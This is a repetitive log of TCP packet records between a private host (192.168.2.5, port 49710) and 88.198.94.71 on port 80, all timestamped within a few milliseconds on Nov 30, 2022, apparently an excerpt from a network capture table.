Nov 30, 2022 00:22:31.871032000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871042013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871051073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871061087 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871069908 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871077061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871092081 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871104956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871118069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871181965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871539116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871560097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871577978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871594906 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871613979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871619940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871633053 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871643066 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871651888 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871659994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871673107 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871690035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871700048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871710062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871746063 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871839046 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871857882 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871871948 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871877909 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871884108 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871897936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871916056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871922970 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871934891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871942997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871953964 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871972084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871975899 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.871989965 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871997118 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872009993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872023106 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872040033 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872056961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872348070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872369051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872386932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872400045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872406960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872420073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872426033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872438908 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872447014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872457981 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872466087 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872477055 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872486115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872493982 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872504950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872513056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872523069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872531891 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872549057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872565985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872868061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872889042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872909069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872929096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872935057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.872950077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.872984886 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873007059 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873008966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873029947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873049021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873066902 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873076916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873085976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873105049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873120070 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873132944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873151064 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873152018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873172998 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873188019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873192072 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873213053 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873224020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873231888 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873250008 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873251915 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873271942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873292923 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873296022 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873311996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873332024 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873342037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873352051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873370886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873389959 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873404026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873409033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873426914 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873430967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873450994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873465061 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873471022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873491049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873501062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873511076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873527050 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873529911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873550892 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873565912 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873569012 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873589039 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873606920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873609066 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873626947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873635054 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873646975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873667002 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873676062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873686075 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873706102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873713970 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873728037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873737097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873749018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873766899 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873768091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873786926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873795033 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873806953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873825073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873832941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873843908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873862982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873872995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873883009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873898029 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873902082 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873922110 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873934031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873939991 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873959064 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873970985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.873976946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.873996973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874001980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874016047 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874021053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874037027 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874057055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874058008 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874078989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874089956 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874100924 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874120951 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874125957 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874140978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874160051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874161959 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874180079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874191999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874198914 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874218941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874233961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874238014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874257088 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874268055 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874277115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874294043 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874294996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874315977 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874326944 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874335051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874353886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874361038 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874376059 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874388933 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874396086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874417067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874425888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874438047 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874461889 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874464035 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874481916 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874486923 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874501944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874516964 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874522924 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874542952 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874543905 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874562025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874578953 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874581099 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874597073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874602079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874622107 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874630928 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874640942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874655962 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874672890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874685049 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874694109 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874713898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874722004 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874732971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874751091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874759912 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874769926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874789000 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874808073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874823093 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874828100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874835968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874849081 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874861956 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874869108 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874897003 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874910116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874928951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874929905 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874950886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874963045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874969006 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.874982119 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.874990940 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875010014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875015020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875030994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875046015 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875051022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875071049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875081062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875089884 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875108957 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875119925 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875129938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875139952 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875150919 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875169992 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875180960 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875190973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875209093 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875225067 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875227928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875247955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875253916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875267982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875274897 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875287056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875305891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875317097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875325918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875344992 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875351906 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875365019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875375032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875386000 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875405073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875411034 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875423908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875442982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875449896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875463963 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875472069 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875484943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875504017 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875508070 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875523090 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875541925 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875545025 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875560999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875566959 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875581980 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875600100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875601053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875618935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875639915 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875653028 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875658989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875677109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875682116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875699997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875704050 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875725985 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875744104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875745058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875765085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875782967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875791073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875803947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875823975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875825882 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875844002 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875864029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875874996 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875881910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875900984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875919104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875937939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875943899 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875958920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875966072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.875978947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.875998020 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876003027 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876019001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876029968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876038074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876056910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876068115 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876076937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876096010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876105070 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876117945 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876127958 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876142025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876157999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876161098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876179934 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876184940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876199961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876216888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876219034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876238108 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876240969 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876257896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876276970 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876282930 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876296997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876316071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876319885 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876333952 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876339912 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876353979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876372099 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876374006 CET	49710	80	192.168.2.5	88.198.94.71
